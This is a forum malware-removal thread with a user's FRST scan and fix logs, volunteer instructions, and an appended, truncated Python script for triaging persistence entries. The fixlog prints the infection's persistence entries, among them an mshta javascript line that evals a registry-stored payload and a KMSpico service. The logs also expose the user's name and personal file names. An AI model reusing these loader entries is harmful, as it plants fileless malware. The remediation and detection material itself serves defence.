2017-06-14 23:07 - 2017-05-12 21:03 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-06-14 23:07 - 2017-05-12 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-06-14 23:07 - 2017-05-12 20:45 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-06-14 23:07 - 2017-05-12 20:45 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-06-14 23:07 - 2017-05-12 20:45 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-06-14 23:07 - 2017-05-12 20:45 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-06-14 23:07 - 2017-05-12 20:44 - 02401792 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-06-14 23:07 - 2017-05-12 20:43 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-06-14 23:07 - 2017-05-12 20:43 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-06-14 23:07 - 2017-05-12 20:41 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-06-14 23:07 - 2017-05-12 19:25 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-06-14 23:07 - 2017-05-12 19:25 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-06-14 23:07 - 2017-05-10 18:16 - 00091368 _____ (Microsoft Corporation) C:\Windows\system32\MigAutoPlay.exe
2017-06-14 23:07 - 2017-05-10 18:12 - 12880896 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 02953216 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2017-06-14 23:07 - 2017-05-10 18:12 - 00174080 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-06-14 23:07 - 2017-05-10 18:10 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-06-14 23:07 - 2017-05-10 18:01 - 02092032 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00573440 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-06-14 23:07 - 2017-05-10 18:00 - 00093696 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-06-14 23:07 - 2017-05-10 18:00 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-06-14 23:07 - 2017-05-10 18:00 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-06-14 23:07 - 2017-05-10 17:47 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-06-14 23:07 - 2017-05-09 18:11 - 00779776 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2017-06-14 23:07 - 2017-05-09 18:11 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-06-14 23:07 - 2017-05-07 18:14 - 00078568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2017-06-14 23:07 - 2017-05-07 17:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2017-06-14 23:07 - 2017-04-28 01:50 - 03550208 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2017-06-14 23:07 - 2017-03-30 17:58 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\rundll32.exe
2017-06-11 12:39 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500 (2).xlsx
2017-06-11 12:39 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500 (1).xlsx
2017-06-11 12:38 - 2017-06-19 23:49 - 01035250 _____ C:\Users\Sachyani\Downloads\53500.xlsx
2017-06-05 14:24 - 2017-06-19 23:50 - 00421005 _____ C:\Users\Sachyani\Downloads\זימון ממרכז רפואי תל-אביב ע_ש סוראסקי.PDF
2017-06-04 14:29 - 2017-06-04 14:29 - 00000000 ____D C:\Users\Sachyani\AppData\Local\752c
2017-06-04 14:02 - 2017-06-04 14:03 - 10768856 _____ (Xvid Team) C:\Users\Sachyani\Downloads\Xvid-1.3.2-20110601.exe
2017-06-04 14:02 - 2017-06-04 14:02 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (6).torrent
2017-06-04 14:01 - 2017-06-04 14:01 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (5).torrent
2017-06-04 13:59 - 2017-06-24 00:31 - 00000000 ____D C:\Users\Sachyani\AppData\Local\Ilsoft
2017-06-04 13:58 - 2017-06-04 14:03 - 00000000 ___HD C:\Users\Sachyani\AppData\Local\SysHashTable
2017-06-04 13:37 - 2017-06-04 14:05 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\vlc
2017-06-04 13:35 - 2017-06-04 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2017-06-04 13:35 - 2017-06-04 13:35 - 00000000 ____D C:\Program Files\VideoLAN
2017-06-04 13:34 - 2017-06-04 13:34 - 30950664 _____ C:\Users\Sachyani\Downloads\vlc-2.2.6-win32.exe
2017-06-04 13:10 - 2017-06-04 13:10 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (4).torrent
2017-06-04 13:08 - 2017-06-04 13:08 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (3).torrent
2017-06-04 13:08 - 2017-06-04 13:08 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (2).torrent
2017-06-04 13:06 - 2017-06-04 13:06 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017 (1).torrent
2017-06-04 13:06 - 2017-06-04 13:06 - 00033020 _____ C:\Users\Sachyani\Downloads\The Other Half 2016.torrent
2017-06-04 01:00 - 2017-06-04 01:00 - 00165003 _____ C:\Users\Sachyani\Downloads\THE-ZOOKEEPERS-WIFE-HDRip.XVid_.ETRG_.torrent
2017-06-04 00:56 - 2017-06-04 00:56 - 00033040 _____ C:\Users\Sachyani\Downloads\The Zookeepers Wife 2017.torrent
2017-06-02 13:40 - 2017-06-02 13:40 - 00029810 _____ C:\Users\Sachyani\Downloads\1F6BF1BDA08EC966D39279A30D0A0C325706B69E.torrent
2017-05-30 12:54 - 2017-06-19 23:49 - 00050064 _____ C:\Users\Sachyani\Downloads\EX883414.tif
2017-05-29 00:42 - 2017-06-19 23:49 - 05287055 _____ C:\Users\Sachyani\Downloads\IMG_0891 (1).MOV
2017-05-29 00:42 - 2017-06-19 23:49 - 05254633 _____ C:\Users\Sachyani\Downloads\IMG_0891.MOV
2017-05-29 00:42 - 2017-06-19 23:49 - 05202730 _____ C:\Users\Sachyani\Downloads\IMG_0891 (2).MOV
2017-05-29 00:41 - 2017-06-19 23:49 - 03537750 _____ C:\Users\Sachyani\Downloads\IMG_0892.MOV
2017-05-29 00:41 - 2017-06-19 23:49 - 02568086 _____ C:\Users\Sachyani\Downloads\IMG_0890.MOV
2017-05-28 00:06 - 2017-05-28 00:06 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\Google
2017-05-27 09:58 - 2017-05-27 09:58 - 00018514 _____ C:\Users\Sachyani\Downloads\BLeumi_20170527095759_39266945_TochnitChisachonYeled.htm
2017-05-27 09:04 - 2017-05-27 09:04 - 00015650 _____ C:\Users\Sachyani\Downloads\Monsters, Inc. (2001) [1080p] [YTS.AG].torrent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-06-24 22:41 - 2017-02-25 16:33 - 00000000 ____D C:\Users\Sachyani\AppData\LocalLow\Mozilla
2017-06-24 22:27 - 2017-02-25 16:32 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2017-06-24 22:09 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\inf
2017-06-24 07:49 - 2009-07-14 07:34 - 00021664 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-06-24 07:49 - 2009-07-14 07:34 - 00021664 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-06-24 00:35 - 2009-07-14 07:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-24 00:35 - 2009-07-14 07:33 - 00453664 _____ C:\Windows\system32\FNTCACHE.DAT
2017-06-24 00:05 - 2017-02-18 14:49 - 00122064 _____ C:\Users\Sachyani\AppData\Local\GDIPFONTCACHEV1.DAT
2017-06-20 14:56 - 2017-02-18 14:28 - 00000000 ____D C:\Users\Sachyani
2017-06-19 23:50 - 2017-03-27 20:14 - 00124505 _____ C:\Users\Sachyani\Downloads\PdfConvertor.pdf
2017-06-19 23:50 - 2017-03-09 09:55 - 00594236 _____ C:\Users\Sachyani\Downloads\כימיה כללית סמסטר א מועד ב תשעז.pdf
2017-06-19 23:50 - 2017-03-09 09:55 - 00546626 _____ C:\Users\Sachyani\Downloads\כימיה כללית סמסטר א מועד א תשעז.pdf
2017-06-19 23:50 - 2017-02-18 16:14 - 446943900 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part3.rar
2017-06-19 23:50 - 2017-02-18 16:12 - 449839104 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part2.rar
2017-06-19 23:49 - 2017-05-12 09:54 - 00012759 _____ C:\Users\Sachyani\Downloads\DOC110517.pdf
2017-06-19 23:49 - 2017-05-07 10:39 - 04661680 _____ C:\Users\Sachyani\Downloads\2017-05-07-VIDEO-00000814.mp4
2017-06-19 23:49 - 2017-04-08 10:24 - 00121782 _____ C:\Users\Sachyani\Downloads\File_1.pdf
2017-06-19 23:49 - 2017-04-07 22:33 - 00339365 _____ C:\Users\Sachyani\Downloads\DATE-0417_CARD-0938.pdf
2017-06-19 23:49 - 2017-03-27 19:42 - 00175886 _____ C:\Users\Sachyani\Downloads\obligation_form (1).pdf
2017-06-19 23:49 - 2017-03-26 13:16 - 00161605 _____ C:\Users\Sachyani\Downloads\labL00806878201703231305.pdf
2017-06-19 23:49 - 2017-03-24 01:31 - 00046910 _____ C:\Users\Sachyani\Downloads\Appointment1.pdf
2017-06-19 23:49 - 2017-03-24 01:29 - 00245959 _____ C:\Users\Sachyani\Downloads\Appointment.pdf
2017-06-19 23:49 - 2017-03-19 00:11 - 00246907 _____ C:\Users\Sachyani\Downloads\college-Calendar-16-17.pdf
2017-06-19 23:49 - 2017-03-19 00:11 - 00184640 _____ C:\Users\Sachyani\Downloads\college-Calendar-17-18.pdf
2017-06-19 23:49 - 2017-02-28 01:05 - 00175833 _____ C:\Users\Sachyani\Downloads\obligation_form.pdf
2017-06-19 23:49 - 2017-02-18 16:11 - 449839104 _____ C:\Users\Sachyani\Downloads\Office Pro Plus 2013 Sp1 x86 VL He.part1.rar
2017-06-16 00:48 - 2017-02-18 16:15 - 00000000 ____D C:\Users\Sachyani\AppData\Roaming\uTorrent
2017-06-16 00:38 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\rescache
2017-06-15 03:46 - 2010-11-21 00:01 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-15 03:37 - 2009-07-14 05:37 - 00000000 ____D C:\Windows\system32\migwiz
2017-06-15 03:21 - 2017-02-18 20:30 - 00000000 ____D C:\Windows\system32\MRT
2017-06-15 03:17 - 2017-02-18 20:30 - 130903960 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-06-15 03:17 - 2017-02-18 16:30 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2017-06-15 03:15 - 2009-07-14 05:04 - 00000478 _____ C:\Windows\win.ini
2017-06-12 13:26 - 2017-03-26 23:44 - 00000000 ___RD C:\Users\Sachyani\Documents\Scanned Documents
 
==================== Files in the root of some directories =======
 
2017-06-19 23:46 - 2017-06-19 23:46 - 15791980 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\en_files.txt
2017-06-19 23:46 - 2017-06-20 14:56 - 15715756 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\en_gfiles.txt
2017-06-23 01:53 - 2017-06-23 01:53 - 4320054 _____ () C:\Users\Sachyani\AppData\Roaming\Microsoft\wp.jpg
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-06-22 00:57
 
==================== End of FRST.txt ============================




#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 11:57 AM

Hi sachyani :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full-time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Please give me a few hours to review your logs and get back to you.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 12:06 PM

Thank you for waiting.

Malicious Programs Warning!

I noticed that you have malicious programs installed on your system. I'll ask you to uninstall them since uninstalling such programs before running malware removal tools will ensure a better clean-up.
  • KMSpico
If you have an issue when uninstalling a program, please let me know.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

Attached Files




#4 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 12:47 PM

Thank you for your time!

Just to get my expectations straight... Is there a chance I'll get my files decrypted?

Formatting the computer or paying the ransom - these are missions I don't want to waste your time on.

Since I posted this topic, I ran a scan by an Avira free anti-virus, and a SpyHunter4 scan (both were executed before I saw your reply...).

However, now I can't see that kmspico program on my control panel. Possibly I deleted it when I was attacked, because I couldn't explain to myself what that was.

Found it. Will attempt to delete it in a minute.

KMSpico is deleted.


Edited by sachyani, 25 June 2017 - 01:18 PM.


#5 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 01:29 PM

I've performed the fixing process.

Here is the fixlog file:

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 25-06-2017 01
Ran by Sachyani (25-06-2017 21:15:48) Run:2
Running from C:\Users\Sachyani\Downloads
Loaded Profiles: Sachyani (Available Profiles: Sachyani)
Boot Mode: Normal
 
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0}] => C:\ProgramData\Microsoft\Performance\TheftProtection\temp\tmp37A2.exe <===== ATTENTION
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [*kszo<*>] => "C:\Users\Sachyani\AppData\Local\752c\1cd2.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...\Run: [27867b84] => C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll ATTENTION
 
CHR Extension: (Flash Control) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen [2017-05-28]
CHR Extension: (Save to Facebook) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd [2017-03-15]
CHR Extension: (Local SWF Player) - C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone [2017-02-25]
 
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [965776 2014-10-26] (@ByELDI) [File not signed]
 
CustomCLSID: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll => No File
 
Task: {0F8FB102-3431-44D6-B625-4D6D1CC0035F} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2014-10-26] (@ByELDI)
Task: {D2CF2B55-1747-4356-9404-DA597EFCBE6E} - System32\Tasks\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => pcalua.exe -a "E:\torrent_files\The Zookeepers Wife 2017\Ultra XVid Codec Pack (2).exe" -d "E:\torrent_files\The Zookeepers Wife 2017"
 
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\7ec8: "C:\Windows\system32\mshta.exe" "javascript:AK6JRZeR="irpBb";h34v=new ActiveXObject("WScript.Shell");Vfse1L2="E6NSp";JppN98=h34v.RegRead("HKCU\\software\\gwqcazcm\\tduo");N36IaYhce="86BB";eval(JppN98);bEJ4Fl="JgMF";" <===== ATTENTION
 
FirewallRules: [{FEE3EABA-D5F4-4725-B867-38F769B7018A}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{3592AE5C-92DE-4392-89A9-165A5C049494}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
 
C:\Program Files\KMSpico
C:\Program Files\ParetoLogic
C:\ProgramData\ParetoLogic
C:\ProgramData\Microsoft\Performance
C:\Users\Sachyani\AppData\Local\752c
C:\Users\Sachyani\AppData\Local\Ilsoft
C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0} => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*kszo<*> => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Microsoft\Windows\CurrentVersion\Run\\27867b84 => value removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9} => key removed successfully.
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdgadgplbbdjlbjgdociahdlmbglfeen => moved successfully
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfikkaogpplgnfjmbjdpalkhclendgd => moved successfully
C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdmbckedabpbgjagmkgcejooabcdnone => moved successfully
Service KMSELDI => service not found.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F8FB102-3431-44D6-B625-4D6D1CC0035F} => key not found. 
C:\Windows\System32\Tasks\AutoPico Daily Restart => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoPico Daily Restart => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D2CF2B55-1747-4356-9404-DA597EFCBE6E} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D2CF2B55-1747-4356-9404-DA597EFCBE6E} => key removed successfully.
C:\Windows\System32\Tasks\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => key removed successfully.
HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\Classes\7ec8 => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FEE3EABA-D5F4-4725-B867-38F769B7018A} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3592AE5C-92DE-4392-89A9-165A5C049494} => value removed successfully.
C:\Program Files\KMSpico => moved successfully
"C:\Program Files\ParetoLogic" => not found.
C:\ProgramData\ParetoLogic => moved successfully
C:\ProgramData\Microsoft\Performance => moved successfully
C:\Users\Sachyani\AppData\Local\752c => moved successfully
C:\Users\Sachyani\AppData\Local\Ilsoft => moved successfully
"C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 136331022 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 1962643870 B
Edge => 0 B
Chrome => 817474822 B
Firefox => 352462316 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 29571609 B
LocalService => 66228 B
NetworkService => 183326 B
Sachyani => 467306251 B
 
RecycleBin => 6362674774 B
EmptyTemp: => 9.4 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 21:20:41 ====

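As an added example (not code from this thread, from FRST or from BleepingComputer): a Python triage pass over FRST-style persistence entries modelled on the ones in the fixlist above. It flags the traits a responder keys on in such a log: targets under AppData or ProgramData, dangling or unsigned files, Run value names with invalid characters, execution proxied through mshta.exe or pcalua.exe, a script payload read back from the registry, and a per-user InprocServer32 registration. The sample lines (with a shortened SID and a trimmed mshta payload), the regexes and the reason strings are constructed assumptions, not FRST's own logic.

```python
"""Triage of FRST-style persistence entries (added example, not FRST code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample modelled on the Fixlog entries in the thread; the SID is
# shortened and the mshta payload trimmed to the pattern that matters.
SAMPLE_LOG = r"""
HKU\S-1-5-21-1000\...\Run: [{C4B700E8-006B-9D20-AB99-2B0C8AECF8C0}] => C:\ProgramData\Microsoft\Performance\TheftProtection\temp\tmp37A2.exe <===== ATTENTION
HKU\S-1-5-21-1000\...\Run: [*kszo<*>] => "C:\Users\Sachyani\AppData\Local\752c\1cd2.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1000\...\Run: [27867b84] => C:\Users\Sachyani\AppData\Roaming\Microsoft\wxdsys.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe (Realtek Semiconductor)
CustomCLSID: HKU\S-1-5-21-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Sachyani\AppData\Local\Ilsoft\mpqzunnc.dll => No File
Task: {D2CF2B55-1747-4356-9404-DA597EFCBE6E} - System32\Tasks\{382A2F75-534A-4306-BE2F-0C6B8B27EF1C} => pcalua.exe -a "E:\torrent_files\Ultra XVid Codec Pack (2).exe"
HKU\S-1-5-21-1000\Software\Classes\7ec8: "C:\Windows\system32\mshta.exe" "javascript:s=new ActiveXObject("WScript.Shell");eval(s.RegRead("HKCU\\software\\gwqcazcm\\tduo"));" <===== ATTENTION
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [965776 2014-10-26] (@ByELDI) [File not signed]
"""

# Directories a standard user can write to without admin rights.
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Downloads)\\", re.I)
# Signed Windows binaries commonly used to proxy execution of something else.
PROXY_BINARIES = re.compile(
    r"\b(?:mshta|pcalua|rundll32|regsvr32|wscript|cscript|powershell)\.exe\b", re.I)
# Script payload carried inline or read back out of the registry (fileless).
REGISTRY_SCRIPT = re.compile(r"javascript:|vbscript:|\bRegRead\s*\(", re.I)
# First drive-letter path ending in an executable-ish extension.
FIRST_PATH = re.compile(
    r"[A-Za-z]:\\[^\"<>|\r\n]+?\.(?:exe|dll|bat|cmd|sys|vbs|js|hta|ps1)\b", re.I)
RUN_VALUE_NAME = re.compile(r"\\Run: \[(?P<name>[^\]]*)\]")
INVALID_NAME_CHARS = re.compile(r"[*<>|?]")
PER_USER_HIVE = re.compile(r"^(?:CustomCLSID: )?HK(?:U|CU)\\")


@dataclass
class Finding:
    line: str
    kind: str
    path: Optional[str]
    reasons: List[str] = field(default_factory=list)


def entry_kind(line: str) -> str:
    """Coarse bucket for one FRST line, keyed on how FRST prefixes it."""
    if line.startswith("Task:"):
        return "scheduled task"
    if line.startswith("CustomCLSID:") or "\\InprocServer32" in line:
        return "COM server"
    if re.match(r"^[RSU]\d Service ", line):
        return "service"
    if RUN_VALUE_NAME.search(line):
        return "run key"
    return "registry value"


def triage_line(line: str) -> Finding:
    """Score one entry; every reason maps to a trait visible in the line itself."""
    f = Finding(line=line, kind=entry_kind(line), path=None)
    m = FIRST_PATH.search(line)
    if m:
        f.path = m.group(0)
    if "<===== ATTENTION" in line:
        f.reasons.append("flagged by FRST")
    if f.path and USER_WRITABLE.search(f.path):
        f.reasons.append("target lives in a user-writable directory")
    if "=> No File" in line:
        f.reasons.append("target file missing (dangling entry)")
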